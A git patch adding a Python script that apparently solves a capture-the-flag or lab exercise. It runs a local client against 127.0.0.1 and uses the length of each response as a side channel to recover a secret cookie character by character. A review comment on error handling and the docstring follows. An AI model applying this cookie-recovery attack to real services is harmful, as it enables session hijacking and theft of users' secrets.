From aeb228882f2e1cfae3495ed482afcc21bc20b893 Mon Sep 17 00:00:00 2001
From: clfreville2
Date: Tue, 10 Oct 2023 16:33:23 +0200
Subject: [PATCH] Add exploit script

---
 exploit.py | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 exploit.py

diff --git a/exploit.py b/exploit.py
new file mode 100644
index 0000000..78a3091
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,29 @@
+from string import ascii_lowercase, ascii_uppercase, digits
+from subprocess import check_output
+
+alphabet = ascii_lowercase + ascii_uppercase + digits
+env = {
+    "LD_PRELOAD": "..."
+}
+
+def request(url: str) -> int:
+    """Executes the client binary with the following URL, and checks its output."""
+    out = check_output(["./client", "127.0.0.1", "8080", url], env=env).decode('utf-8')
+    return int(out.split(' ')[1])
+
+
+if __name__ == '__main__':
+    cookie = ''
+    best_len = request('flag=' + cookie)
+
+    while True:
+        for c in alphabet:
+            current = request('flag=' + cookie + c)
+            if current <= best_len:
+                cookie += c
+                best_len = current
+                print(f'Found one byte in cookie: {cookie}')
+                break
+        else:
+            print(f'Found complete cookie: {cookie}')
+            break
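Review bot: `request()` parses the client's reply with `int(out.split(' ')[1])` and handles neither a non-zero exit (`check_output` raises `CalledProcessError`) nor a reply with fewer than two space-separated fields, so one transient client failure ends the whole search with an uninformative traceback instead of a message naming the bad reply; a minimal guard is `fields = out.split(' ')` / `if len(fields) < 2: raise RuntimeError(f'unexpected client reply: {out!r}')` / `return int(fields[1])`. Passing `env=env` replaces the child's entire environment rather than extending it, so only `LD_PRELOAD` reaches `./client`; if that is intended, a one-line comment on the `env` dict saying so would save the next reader a guess, and as committed the `"..."` value is a placeholder the script cannot run with. The docstring on `request` says "following URL"; `given URL` reads better, and the docstring should also state that the second field of the client's output is parsed as an integer length. In the `__main__` block the final `else:` is read here as the `for` loop's else clause (no candidate shortened the reply), which is what makes the `while True` terminate; a comment `# for/else: no candidate shrank the reply, so the prefix is complete` on that line would make the intent explicit.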